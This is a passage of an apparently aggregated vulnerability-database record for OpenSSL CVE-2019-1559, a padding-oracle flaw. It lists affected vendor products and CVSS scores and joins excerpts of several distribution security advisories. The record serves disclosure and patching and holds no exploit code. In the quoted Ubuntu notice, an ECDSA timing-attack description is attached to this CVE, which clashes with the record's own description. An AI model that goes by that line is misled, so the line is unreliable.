        "_id": null,
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "31"
      },
      {
        "_id": null,
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "_id": null,
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "_id": null,
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.1.0"
      },
      {
        "_id": null,
        "model": "communications session router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.3"
      },
      {
        "_id": null,
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "6.9.0"
      },
      {
        "_id": null,
        "model": "oncommand unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "services tools bundle",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "19.2"
      },
      {
        "_id": null,
        "model": "pan-os",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "paloaltonetworks",
        "version": "7.1.0"
      },
      {
        "_id": null,
        "model": "a220",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "business intelligence",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.2.1.3.0"
      },
      {
        "_id": null,
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "7.4"
      },
      {
        "_id": null,
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "_id": null,
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "_id": null,
        "model": "communications performance intelligence center",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "10.4.0.2"
      },
      {
        "_id": null,
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "_id": null,
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "_id": null,
        "model": "pan-os",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "paloaltonetworks",
        "version": "7.1.15"
      },
      {
        "_id": null,
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "_id": null,
        "model": "mysql",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.6.43"
      },
      {
        "_id": null,
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "_id": null,
        "model": "pan-os",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "paloaltonetworks",
        "version": "8.1.8"
      },
      {
        "_id": null,
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "_id": null,
        "model": "hci compute node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "big-iq centralized management",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "7.1.0"
      },
      {
        "_id": null,
        "model": "hyper converged infrastructure",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "_id": null,
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "_id": null,
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "_id": null,
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "_id": null,
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.2"
      },
      {
        "_id": null,
        "model": "jd edwards world security",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "a9.3"
      },
      {
        "_id": null,
        "model": "storage automation store",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "virtualization",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "_id": null,
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "_id": null,
        "model": "threat intelligence exchange server",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "mcafee",
        "version": "3.0.0"
      },
      {
        "_id": null,
        "model": "enterprise manager base platform",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "13.2.0.0.0"
      },
      {
        "_id": null,
        "model": "storagegrid",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "_id": null,
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "_id": null,
        "model": "communications session router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "_id": null,
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "_id": null,
        "model": "traffix signaling delivery controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "5.1.0"
      },
      {
        "_id": null,
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "_id": null,
        "model": "communications unified session manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "7.3.5"
      },
      {
        "_id": null,
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "_id": null,
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "29"
      },
      {
        "_id": null,
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "_id": null,
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "_id": null,
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "_id": null,
        "model": "traffix signaling delivery controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "5.0.0"
      },
      {
        "_id": null,
        "model": "cn1610",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "_id": null,
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "communications session router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "7.4"
      },
      {
        "_id": null,
        "model": "pan-os",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "paloaltonetworks",
        "version": "8.1.0"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "6.8.1"
      },
      {
        "_id": null,
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "_id": null,
        "model": "santricity smi-s provider",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "_id": null,
        "model": "agent",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "mcafee",
        "version": "5.6.4"
      },
      {
        "_id": null,
        "model": "business intelligence",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.2.1.4.0"
      },
      {
        "_id": null,
        "model": "endeca server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "7.7.0"
      },
      {
        "_id": null,
        "model": "mysql",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.0"
      },
      {
        "_id": null,
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "_id": null,
        "model": "ontap select deploy administration utility",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "_id": null,
        "model": "element software",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-iq centralized management",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "6.0.0"
      },
      {
        "_id": null,
        "model": "web gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "mcafee",
        "version": "9.0.0"
      },
      {
        "_id": null,
        "model": "jd edwards world security",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "a9.3.1"
      },
      {
        "_id": null,
        "model": "jd edwards enterpriseone tools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "9.2"
      },
      {
        "_id": null,
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.10"
      },
      {
        "_id": null,
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "_id": null,
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "_id": null,
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.3.3"
      },
      {
        "_id": null,
        "model": "mysql",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.6.0"
      },
      {
        "_id": null,
        "model": "storagegrid",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "9.0.4"
      },
      {
        "_id": null,
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "_id": null,
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "_id": null,
        "model": "pan-os",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "paloaltonetworks",
        "version": "8.0.0"
      },
      {
        "_id": null,
        "model": "jp1/snmp system observer",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      },
      {
        "_id": null,
        "model": "steelstore cloud integrated storage",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "oncommand workflow automation",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "jp1/operations analytics",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      },
      {
        "_id": null,
        "model": "job management system partern 1/automatic job management system 3",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      },
      {
        "_id": null,
        "model": "storagegrid webscale",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "nessus",
        "scope": null,
        "trust": 0.8,
        "vendor": "tenable",
        "version": null
      },
      {
        "_id": null,
        "model": "ucosminexus service architect",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      },
      {
        "_id": null,
        "model": "leap",
        "scope": null,
        "trust": 0.8,
        "vendor": "opensuse",
        "version": null
      },
      {
        "_id": null,
        "model": "jp1/automatic job management system 3",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      },
      {
        "_id": null,
        "model": "traffix sdc",
        "scope": null,
        "trust": 0.8,
        "vendor": "f5",
        "version": null
      },
      {
        "_id": null,
        "model": "jp1/data highway",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": null,
        "trust": 0.8,
        "vendor": "openssl",
        "version": null
      },
      {
        "_id": null,
        "model": "ucosminexus primary server",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      },
      {
        "_id": null,
        "model": "ucosminexus developer",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      },
      {
        "_id": null,
        "model": "ubuntu",
        "scope": null,
        "trust": 0.8,
        "vendor": "canonical",
        "version": null
      },
      {
        "_id": null,
        "model": "ucosminexus service platform",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      },
      {
        "_id": null,
        "model": "santricity smi-s provider",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "gnu/linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "debian",
        "version": null
      },
      {
        "_id": null,
        "model": "ontap select deploy administration utility",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "jp1/it desktop management 2",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      },
      {
        "_id": null,
        "model": "jp1/performance management",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      },
      {
        "_id": null,
        "model": "ontap select deploy",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "snapdrive",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "oncommand unified manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "jp1/automatic operation",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      },
      {
        "_id": null,
        "model": "cosminexus http server",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      },
      {
        "_id": null,
        "model": "hyper converged infrastructure",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "element software",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "ucosminexus application server",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u7acb",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002098"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-1559"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Robert Merget and Nimrod Aviram, with additional investigation by Steven Collison and Andrew Hourselt,Red Hat,Slackware Security Team,Juraj Somorovsky",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-956"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-1559",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CVE-2019-1559",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.9,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "VHN-147651",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.2,
            "id": "CVE-2019-1559",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.9,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-1559",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2019-1559",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2019-1559",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201902-956",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-147651",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-1559",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147651"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-1559"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201902-956"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-002098"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-1559"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "If an application encounters a fatal protocol error and then calls SSL_shutdown() twice (once to send a close_notify, and once to receive one) then OpenSSL can respond differently to the calling application if a 0 byte record is received with invalid padding compared to if a 0 byte record is received with an invalid MAC. If the application then behaves differently based on that in a way that is detectable to the remote peer, then this amounts to a padding oracle that could be used to decrypt data. In order for this to be exploitable \"non-stitched\" ciphersuites must be in use. Stitched ciphersuites are optimised implementations of certain commonly used ciphersuites. Also the application must call SSL_shutdown() twice even if a protocol error has occurred (applications should not do this but some do anyway). Fixed in OpenSSL 1.0.2r (Affected 1.0.2-1.0.2q). OpenSSL Contains an information disclosure vulnerability.Information may be obtained. The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc. A vulnerability in OpenSSL could allow an unauthenticated, remote malicious user to access sensitive information on a targeted system. An attacker who is able to perform man-in-the-middle attacks could exploit the vulnerability by persuading a user to access a link that submits malicious input to the affected software. A successful exploit could allow the malicious user to intercept and modify the browser requests and then observe the server behavior in order to conduct a padding oracle attack and decrypt sensitive information. \n\nThis issue was discovered by Juraj Somorovsky, Robert Merget and Nimrod Aviram,\nwith additional investigation by Steven Collison and Andrew Hourselt. It was\nreported to OpenSSL on 10th December 2018. \n\nNote: Advisory updated to make it clearer that AEAD ciphersuites are not impacted. \n\nNote\n====\n\nOpenSSL 1.0.2 and 1.1.0 are currently only receiving security updates. Support\nfor 1.0.2 will end on 31st December 2019. Support for 1.1.0 will end on 11th\nSeptember 2019. Users of these versions should upgrade to OpenSSL 1.1.1. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20190226.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n. Description:\n\nThe RHV-M Virtual Appliance automates the process of installing and\nconfiguring the Red Hat Virtualization Manager. The appliance is available\nto download as an OVA file from the Customer Portal. \n\nThe following packages have been upgraded to a later upstream version:\nrhvm-appliance (4.3). \n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1.0.2r-1~deb9u1. \n\nWe recommend that you upgrade your openssl1.0 packages. \n\nFor the detailed security status of openssl1.0 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/openssl1.0\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlx4WgkACgkQEMKTtsN8\nTjZZCQ//UdQ3Bi/ZSQJ2yzW7MkbuaHla53iUhztTy2Zrype++NX4tXqqBl+xY9Eu\n1D747Y1c2GZ949UaPbIvp8wLCvvxR5A4Tmx4sU3ZOOHXrlsZ5loYg66MslGUOMOU\nz7zaqXTg3as8wfD6ND5Zd4tP0iLyst8Vyi0W7PuFovLoPAc3/XcMaXghSwabs+JY\n3KZuB4UlbOiEnO+6Mf5ghWQYBtN7y/QAVNWREfLmhpx2UY8F7Ia28bR9pXknxkl5\nRuN9WH2BtXI4/JiL0TlkAua51NE+vXciPv+Dh4gkQNPWF/rfL9IL5AxjrgojysHf\nOhZaDcYpOPCXZmiA49JOXJOrIw73Zd9NZmgA1ZXQY1ECQDJ8dB9mSJj1KsUId+Id\neTbRRbWwpzSQd5qc4h4NKjeIwA04a3JecDibD3pwf3+qn9sw8xQ/rfAl2byGRbEN\nFUDT65AIw4CFQDJeIE/vBZqCFhY2aIbRoibpZnp0XsROkw8xKQiH0Kgo7gjsoozT\nwHYK/rlvaZwbnLG7E8pUUj9Xr8OM9Wn/y7kzyHVekGUcDef3F1pPJ9CYsdppx+Zv\nMkoFNxc9GZ+Kn2i4l14I3hvwQ4Sy3owNjnTYFQ28yd+MRZoMw+nyXW1i7OCu+KFH\n7OQkd5qNDh8iotsaUKT0DQOOL74UDgEPv2x02ahujRl+I3YDDdM=NRWo\n-----END PGP SIGNATURE-----\n. ==========================================================================\nUbuntu Security Notice USN-4376-2\nJuly 09, 2020\n\nopenssl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n- Ubuntu 12.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. This update provides\nthe corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. \n\nOriginal advisory details:\n\n Cesar Pereida Garc\\xeda, Sohaib ul Hassan, Nicola Tuveri, Iaroslav Gridin,\n Alejandro Cabrera Aldaya, and Billy Brumley discovered that OpenSSL\n incorrectly handled ECDSA signatures. An attacker could possibly use this\n issue to perform a timing side-channel attack and recover private ECDSA\n keys. A remote attacker could possibly use this issue to decrypt\n data. (CVE-2019-1559)\n\n Bernd Edlinger discovered that OpenSSL incorrectly handled certain\n decryption functions. (CVE-2019-1563)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n  libssl1.0.0                     1.0.1f-1ubuntu2.27+esm1\n\nUbuntu 12.04 ESM:\n  libssl1.0.0                     1.0.1-4ubuntu5.44\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201903-10\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: OpenSSL: Multiple vulnerabilities\n     Date: March 14, 2019\n     Bugs: #673056, #678564\n       ID: 201903-10\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple Information Disclosure vulnerabilities in OpenSSL allow\nattackers to obtain sensitive information. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  dev-libs/openssl             \u003c 1.0.2r                  \u003e= 1.0.2r \n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nA remote attacker to obtain sensitive information, caused by the\nfailure to immediately close the TCP connection after the hosts\nencounter a zero-length record with valid padding. \n\nA local attacker could run a malicious process next to legitimate\nprocesses using the architectureas parallel thread running capabilities\nto leak encrypted data from the CPU\u0027s internal processes. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.2r\"\n\nReferences\n==========\n\n[ 1 ] CVE-2018-5407\n      https://nvd.nist.gov/vuln/detail/CVE-2018-5407\n[ 2 ] CVE-2019-1559\n      https://nvd.nist.gov/vuln/detail/CVE-2019-1559\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201903-10\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2019 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nTomcat Servlet container, JBoss HTTP Connector (mod_cluster), the\nPicketLink Vault extension for Apache Tomcat, and the Tomcat Native\nlibrary. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Moderate: openssl security and bug fix update\nAdvisory ID:       RHSA-2019:2304-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2019:2304\nIssue date:        2019-08-06\nCVE Names:         CVE-2018-0734 CVE-2019-1559\n====================================================================\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed 